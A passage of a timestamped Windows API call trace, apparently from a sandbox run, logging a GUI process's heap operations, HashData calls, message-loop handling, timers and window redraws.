pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0184.896] HashData (in: pbData=0x6d773c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0184.896] HashData (in: pbData=0x6d7744, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.896] HashData (in: pbData=0x6d7750, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0184.896] HashData (in: pbData=0x6d7754, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0184.896] HashData (in: pbData=0x6d775c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0184.896] HashData (in: pbData=0x6d7768, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0184.896] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7708 | out: hHeap=0x5e0000) returned 1 [0184.896] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82ff8 | out: hHeap=0x5e0000) returned 1 [0184.896] HashData (in: pbData=0x9ee6cc0, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0184.896] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0184.896] HashData (in: pbData=0x9ee6cc4, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0184.896] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6cc0 | out: hHeap=0x5e0000) returned 1 [0184.897] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0184.897] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0184.897] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0184.897] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0184.897] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0184.897] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0184.898] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82ed8 [0184.898] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0184.898] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0184.898] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0184.898] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0184.898] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0184.898] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0184.898] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0184.900] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f68 [0184.900] GetSysColor (nIndex=15) returned 0xf0f0f0 [0184.901] GetSysColor (nIndex=15) returned 0xf0f0f0 [0184.901] GetSysColor (nIndex=15) returned 0xf0f0f0 [0184.902] GetSysColor (nIndex=15) returned 0xf0f0f0 [0184.902] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0184.903] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f38 [0184.905] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82ed8 | out: hHeap=0x5e0000) returned 1 [0184.905] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f68 | out: hHeap=0x5e0000) returned 1 [0184.905] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f38 | out: hHeap=0x5e0000) returned 1 [0184.905] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x68caf8 | out: hHeap=0x5e0000) returned 1 [0184.910] GetClientRect (in: hWnd=0x103e2, lpRect=0x199be4 | out: lpRect=0x199be4) returned 1 [0184.910] BitBlt (hdc=0x51010a85, x=171, y=213, cx=42, cy=23, hdcSrc=0x8e01071c, x1=171, y1=213, rop=0xcc0020) returned 1 [0184.911] ReleaseDC (hWnd=0x103e2, hDC=0x51010a85) returned 1 [0184.912] ReleaseDC (hWnd=0x103e2, hDC=0x4010197) returned 1 [0184.912] QueryPerformanceCounter (in: lpPerformanceCount=0x199d00 | out: lpPerformanceCount=0x199d00*=3100373090386) returned 1 [0184.913] DeleteObject (ho=0x2c040a81) returned 1 [0184.913] GetCurrentThreadId () returned 0xb48 [0184.913] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0184.913] QueryPerformanceCounter (in: lpPerformanceCount=0x19a218 | out: lpPerformanceCount=0x19a218*=3100373220273) returned 1 [0184.913] QueryPerformanceCounter (in: lpPerformanceCount=0x19a228 | out: lpPerformanceCount=0x19a228*=3100373227147) returned 1 [0184.913] KillTimer (hWnd=0x30316, uIDEvent=0x202c) returned 1 [0184.914] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0184.914] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0184.914] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0184.914] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0184.914] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0184.914] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0184.914] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 7140024 [0184.915] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0184.915] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0184.915] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0184.915] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 0 [0184.915] QueryPerformanceCounter (in: lpPerformanceCount=0x19a3bc | out: lpPerformanceCount=0x19a3bc*=3100373397464) returned 1 [0184.940] RedrawWindow (hWnd=0x30316, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x2) returned 1 [0184.940] NtdllDefWindowProc_W () returned 0x0 [0184.940] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0184.940] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0184.940] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0184.940] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 7140024 [0184.940] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0184.941] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 0 [0184.941] QueryPerformanceCounter (in: lpPerformanceCount=0x19a3bc | out: lpPerformanceCount=0x19a3bc*=3100375963984) returned 1 [0184.941] NtdllDefWindowProc_W () returned 0x0 [0184.941] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0184.941] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0184.941] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0184.941] QueryPerformanceCounter (in: lpPerformanceCount=0x19a2c0 | out: lpPerformanceCount=0x19a2c0*=3100376013477) returned 1 [0184.942] SetEvent (hEvent=0x304) returned 1 [0184.942] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0184.943] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0184.943] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0184.943] KillTimer (hWnd=0x30316, uIDEvent=0x202f) returned 1 [0184.943] QueryPerformanceCounter (in: lpPerformanceCount=0x19a26c | out: lpPerformanceCount=0x19a26c*=3100376202727) returned 1 [0184.943] QueryPerformanceCounter (in: lpPerformanceCount=0x19a23c | out: lpPerformanceCount=0x19a23c*=3100376212349) returned 1 [0184.943] QueryPerformanceCounter (in: lpPerformanceCount=0x19a218 | out: lpPerformanceCount=0x19a218*=3100376222071) returned 1 [0184.943] QueryPerformanceCounter (in: lpPerformanceCount=0x19a228 | out: lpPerformanceCount=0x19a228*=3100376228011) returned 1 [0184.943] SetEvent (hEvent=0x668) returned 1 [0184.944] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0184.944] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0184.944] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0184.944] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0184.945] KillTimer (hWnd=0x103e2, uIDEvent=0x1000) returned 1 [0184.945] GetCurrentThreadId () returned 0xb48 [0184.945] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0185.122] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0185.122] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0185.123] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0185.149] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0185.149] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0185.149] KillTimer (hWnd=0x30316, uIDEvent=0x202e) returned 1 [0185.149] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0186.692] GetAsyncKeyState (vKey=17) returned 0 [0186.692] GetAsyncKeyState (vKey=16) returned 0 [0186.692] GetAsyncKeyState (vKey=18) returned 0 [0186.693] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a0d0 | out: lpPoint=0x19a0d0) returned 1 [0186.693] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0186.693] memcpy_s (in: _Destination=0xd9b560, _DestinationSize=0x118, _Source=0x19a118, _SourceSize=0x118 | out: _Destination=0xd9b560) returned 0x0 [0186.693] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x6dcd20 [0186.693] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0186.694] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0186.694] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0186.694] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd70 | out: lpSystemTimeAsFileTime=0xbffd70*(dwLowDateTime=0x75e102cf, dwHighDateTime=0x1d7d80b)) [0186.694] GetTickCount () returned 0x1d792fb [0186.694] IUnknown:AddRef (This=0xd6ab40) returned 0x0 [0186.695] IUnknown:Release (This=0xd6ab40) returned 0x7 [0186.695] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd78 | out: lpSystemTimeAsFileTime=0xbffd78*(dwLowDateTime=0x75e12a8f, dwHighDateTime=0x1d7d80b)) [0186.695] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd70 | out: lpSystemTimeAsFileTime=0xbffd70*(dwLowDateTime=0x75e12a8f, dwHighDateTime=0x1d7d80b)) [0186.695] GetTickCount () returned 0x1d792fb [0186.695] GetCurrentThreadId () returned 0xb48 [0186.696] malloc (_Size=0x28) returned 0xc5d008 [0186.697] GetCurrentThreadId () returned 0xb48 [0186.697] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0186.697] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0186.697] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0186.699] IUnknown:Release (This=0xd99180) returned 0x1 [0186.699] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0186.700] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0186.700] SetTimer (hWnd=0x103e2, nIDEvent=0x1000, uElapse=0x64, lpTimerFunc=0x0) returned 0x1000 [0186.700] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0186.700] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0186.701] IUnknown:Release (This=0xd991c0) returned 0x1 [0186.701] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0186.701] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0186.701] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0186.701] IUnknown:Release (This=0xd6ab40) returned 0x7 [0186.701] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0186.701] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0186.701] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0186.702] SysStringLen (param_1="btnYes") returned 0x6 [0186.702] GetCurrentThreadId () returned 0xb48 [0186.702] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd78 | out: lpSystemTimeAsFileTime=0xbffd78*(dwLowDateTime=0x75e23991, dwHighDateTime=0x1d7d80b)) [0186.702] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd70 | out: lpSystemTimeAsFileTime=0xbffd70*(dwLowDateTime=0x75e23991, dwHighDateTime=0x1d7d80b)) [0186.702] GetTickCount () returned 0x1d792fb [0186.702] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd78 | out: lpSystemTimeAsFileTime=0xbffd78*(dwLowDateTime=0x75e23991, dwHighDateTime=0x1d7d80b)) [0186.702] free (_Block=0xc5d008) [0186.703] GetCurrentThreadId () returned 0xb48 [0186.703] GetCurrentThreadId () returned 0xb48 [0186.703] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0186.703] GetCurrentThreadId () returned 0xb48 [0186.703] GetCurrentThreadId () returned 0xb48 [0186.703] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0186.704] GetCurrentThreadId () returned 0xb48 [0186.704] GetCurrentThreadId () returned 0xb48 [0186.704] GetCurrentThreadId () returned 0xb48 [0186.704] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0186.704] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0186.704] memcpy_s (in: _Destination=0xd9b680, _DestinationSize=0x118, _Source=0xd9b560, _SourceSize=0x118 | out: _Destination=0xd9b680) returned 0x0 [0186.704] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x6dcd00 [0186.705] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0186.705] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dcd00 | out: hHeap=0x5e0000) returned 1 [0186.705] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dcd20 | out: hHeap=0x5e0000) returned 1 [0186.706] GetMessageTime () returned 30903765 [0186.706] GetMessagePos () returned 0x11e01d6 [0186.706] IsWindowUnicode (hWnd=0x103e2) returned 1 [0186.706] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x199f80 | out: lpPoint=0x199f80) returned 1 [0186.707] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0186.707] memcpy_s (in: _Destination=0xd9b7a0, _DestinationSize=0x118, _Source=0x199fc8, _SourceSize=0x118 | out: _Destination=0xd9b7a0) returned 0x0 [0186.707] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x16) returned 0x6dcd60 [0186.707] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0186.707] GetCurrentThreadId () returned 0xb48 [0186.707] GetCurrentThreadId () returned 0xb48 [0186.707] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0186.707] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0186.708] GetCurrentThreadId () returned 0xb48 [0186.708] GetCurrentThreadId () returned 0xb48 [0186.708] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0186.708] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0186.708] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0186.709] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd70 | out: lpSystemTimeAsFileTime=0xbffd70*(dwLowDateTime=0x75e3374d, dwHighDateTime=0x1d7d80b)) [0186.709] GetTickCount () returned 0x1d7930b [0186.709] IUnknown:AddRef (This=0xcf9aa0) returned 0x3 [0186.709] IUnknown:Release (This=0xcf9aa0) returned 0x3 [0186.709] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd78 | out: lpSystemTimeAsFileTime=0xbffd78*(dwLowDateTime=0x75e34aff, dwHighDateTime=0x1d7d80b)) [0186.709] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd70 | out: lpSystemTimeAsFileTime=0xbffd70*(dwLowDateTime=0x75e34aff, dwHighDateTime=0x1d7d80b)) [0186.709] GetTickCount () returned 0x1d7930b [0186.709] GetCurrentThreadId () returned 0xb48 [0186.710] free (_Block=0x0) [0186.711] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0186.711] GetCurrentThreadId () returned 0xb48 [0186.711] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0186.711] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0186.711] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0186.711] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0186.712] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0186.712] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0186.712] malloc (_Size=0x28) returned 0xc5d248 [0186.712] GetCurrentThreadId () returned 0xb48 [0186.712] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0186.712] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0186.712] IUnknown:Release (This=0xd99380) returned 0x1 [0186.713] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0186.713] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0186.713] GetCurrentThreadId () returned 0xb48 [0186.713] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd78 | out: lpSystemTimeAsFileTime=0xbffd78*(dwLowDateTime=0x75e3e91d, dwHighDateTime=0x1d7d80b)) [0186.713] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd70 | out: lpSystemTimeAsFileTime=0xbffd70*(dwLowDateTime=0x75e3e91d, dwHighDateTime=0x1d7d80b)) [0186.713] GetTickCount () returned 0x1d7930b [0186.713] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd78 | out: lpSystemTimeAsFileTime=0xbffd78*(dwLowDateTime=0x75e3fa58, dwHighDateTime=0x1d7d80b)) [0186.713] free (_Block=0xc5d248) [0186.714] GetCurrentThreadId () returned 0xb48 [0186.714] GetCurrentThreadId () returned 0xb48 [0186.714] GetCurrentThreadId () returned 0xb48 [0186.714] IsCharAlphaNumericW (ch=0xd) returned 0 [0186.714] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0186.714] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0186.714] memcpy_s (in: _Destination=0xd9b8c0, _DestinationSize=0x118, _Source=0xd9b7a0, _SourceSize=0x118 | out: _Destination=0xd9b8c0) returned 0x0 [0186.714] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x16) returned 0x6dce40 [0186.714] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0186.715] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0186.715] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dce40 | out: hHeap=0x5e0000) returned 1 [0186.716] GetFocus () returned 0x103e2 [0186.717] GetFocus () returned 0x103e2 [0186.717] GetFocus () returned 0x103e2 [0186.717] GetFocus () returned 0x103e2 [0186.717] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x199bf8 | out: lpPoint=0x199bf8) returned 1 [0186.718] GetCapture () returned 0x0 [0186.718] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0186.718] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0186.718] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0186.718] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd70 | out: lpSystemTimeAsFileTime=0xbffd70*(dwLowDateTime=0x75e4ae42, dwHighDateTime=0x1d7d80b)) [0186.719] GetTickCount () returned 0x1d7930b [0186.719] IUnknown:AddRef (This=0xd6ab40) returned 0x0 [0186.719] IUnknown:Release (This=0xd6ab40) returned 0x8 [0186.719] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd78 | out: lpSystemTimeAsFileTime=0xbffd78*(dwLowDateTime=0x75e4d166, dwHighDateTime=0x1d7d80b)) [0186.719] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd70 | out: lpSystemTimeAsFileTime=0xbffd70*(dwLowDateTime=0x75e4d166, dwHighDateTime=0x1d7d80b)) [0186.719] GetTickCount () returned 0x1d7930b [0186.719] GetCurrentThreadId () returned 0xb48 [0186.720] GetCurrentThreadId () returned 0xb48 [0186.720] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0186.720] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0186.720] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0186.720] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0186.720] malloc (_Size=0x28) returned 0xc5d248 [0186.720] GetCurrentThreadId () returned 0xb48 [0186.721] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0186.721] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0186.721] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0186.721] GetCurrentThreadId () returned 0xb48 [0186.721] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0186.721] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0186.721] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0186.721] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0186.721] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0186.722] GetCurrentThreadId () returned 0xb48 [0186.722] free (_Block=0x0) [0186.723] GetCurrentThreadId () returned 0xb48 [0186.723] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0186.723] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0186.723] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0186.723] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0186.723] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0186.723] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0186.723] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0186.723] GetCurrentThreadId () returned 0xb48 [0186.723] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0186.723] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0186.724] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0186.724] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0186.724] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0186.724] GetCurrentThreadId () returned 0xb48 [0186.724] GetCurrentThreadId () returned 0xb48 [0186.724] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd78 | out: lpSystemTimeAsFileTime=0xbffd78*(dwLowDateTime=0x75e5a8d8, dwHighDateTime=0x1d7d80b)) [0186.724] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd70 | out: lpSystemTimeAsFileTime=0xbffd70*(dwLowDateTime=0x75e5a8d8, dwHighDateTime=0x1d7d80b)) [0186.724] GetTickCount () returned 0x1d7931a [0186.724] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd78 | out: lpSystemTimeAsFileTime=0xbffd78*(dwLowDateTime=0x75e5a8d8, dwHighDateTime=0x1d7d80b)) [0186.725] free (_Block=0xc5d248) [0186.725] GetCurrentThreadId () returned 0xb48 [0186.725] GetCurrentThreadId () returned 0xb48 [0186.725] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0186.725] GetCurrentThreadId () returned 0xb48 [0186.726] GetCurrentThreadId () returned 0xb48 [0186.726] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0186.726] GetCurrentThreadId () returned 0xb48 [0186.726] GetCurrentThreadId () returned 0xb48 [0186.726] GetCurrentThreadId () returned 0xb48 [0186.726] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0186.726] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0186.727] IsWinEventHookInstalled (event=0x8013) returned 1 [0186.727] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0186.727] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0186.727] malloc (_Size=0xb0) returned 0xc7f1a8 [0186.727] NotifyWinEvent (event=0x8013, hwnd=0x103e2, idObject=1, idChild=0) [0186.727] GetCurrentThreadId () returned 0xb48 [0186.728] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dcd60 | out: hHeap=0x5e0000) returned 1 [0186.728] GetCurrentThreadId () returned 0xb48 [0186.728] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0186.728] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0186.728] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0186.728] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0186.728] PostMessageW (hWnd=0x103e0, Msg=0x404, wParam=0x0, lParam=0x0) returned 1 [0186.728] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0186.728] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0186.728] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0186.728] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0186.729] GetCurrentThreadId () returned 0xb48 [0186.729] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x198748 | out: lpPoint=0x198748) returned 1 [0186.729] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0186.729] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x1985b0 | out: lpPoint=0x1985b0) returned 1 [0186.729] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0186.730] GetCurrentThreadId () returned 0xb48 [0186.730] GetCurrentThreadId () returned 0xb48 [0186.730] GetCurrentThreadId () returned 0xb48 [0186.730] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a254 | out: lpPoint=0x19a254) returned 1 